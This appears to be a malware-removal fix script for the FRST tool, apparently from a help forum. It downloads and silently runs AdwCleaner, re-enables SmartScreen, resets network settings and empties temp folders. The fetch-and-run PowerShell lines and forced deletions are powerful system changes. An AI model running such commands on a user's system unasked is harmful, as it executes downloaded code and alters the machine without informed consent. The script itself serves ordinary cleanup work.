Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:

CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Warn" /f
CMD: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 1 /f
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
C:\Windows\SystemTemp\*

EmptyTemp:
End::
Malware Log Analysis

content
